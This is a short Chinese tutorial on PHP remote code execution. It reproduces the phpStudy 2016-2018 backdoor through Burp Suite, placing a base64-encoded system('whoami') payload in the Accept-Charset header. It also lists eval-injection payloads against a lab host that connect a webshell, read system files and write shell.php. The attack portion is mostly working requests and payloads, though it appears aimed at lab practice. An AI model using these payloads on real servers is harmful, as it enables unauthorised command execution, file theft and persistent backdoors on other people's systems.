Remote Command/Code Execute
远程命令执行/远程代码执行漏洞
这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。
传入 PHP 代码执行函数的变量,客户端可控,并且没有做严格的过滤。那么攻击者可以随意输入(注入,注射,Inject)想要执行的代码,并且在服务器端执行。如果代码在服务器端执行成功,就认为存在 PHP 代码注入漏洞,也就是 RCE。
继承当前用户权限:
RCE漏洞通常被评级为高危或严重的漏洞,因为其危害性较大,能够导致系统完全被攻击者控制。
phpstudy_2016-2018_rce_backdoor 漏洞复现
打开 bp
打开代理浏览器
访问 php 页面
回到 bp
查看 http 历史,找到刚刚访问的 php 页面
发送到 Repeater
转到 Repeater
php 页面请求内容加
Accept-Charset:
修改 Accept-Encoding,删除 deflate 前的空格
Accept-Encoding: gzip,deflate
将要执行的命令写入到 system(“”) 中如
system("whoami");
Decoder 模块 base64 编码
# 对 system("whoami") 编码
c3lzdGVtKCJ3aG9hbWkiKTs=
将编码放到 Accept-Charset:
后
Accept-Charset: c3lzdGVtKCJ3aG9hbWkiKTs=
点击 Send 发送
查看返回的数据
成功回显执行的命令
代码执行漏洞的利用方式有很多种。
获取Shell,蚁剑可以直接连接。
shell: http://10.4.7.187/php/functions/eval.php
pass: code
获取当前文件的绝对路径。
?code=print(__FILE__);
读文件。
?code=print(file_get_contents('eval.php'));
?code=print(file_get_contents('c:/windows/system32/drivers/etc/hosts'));
写文件。
?code=file_put_contents('shell.php','');
?code=file_put_contents(要写入的文件,要写入的内容)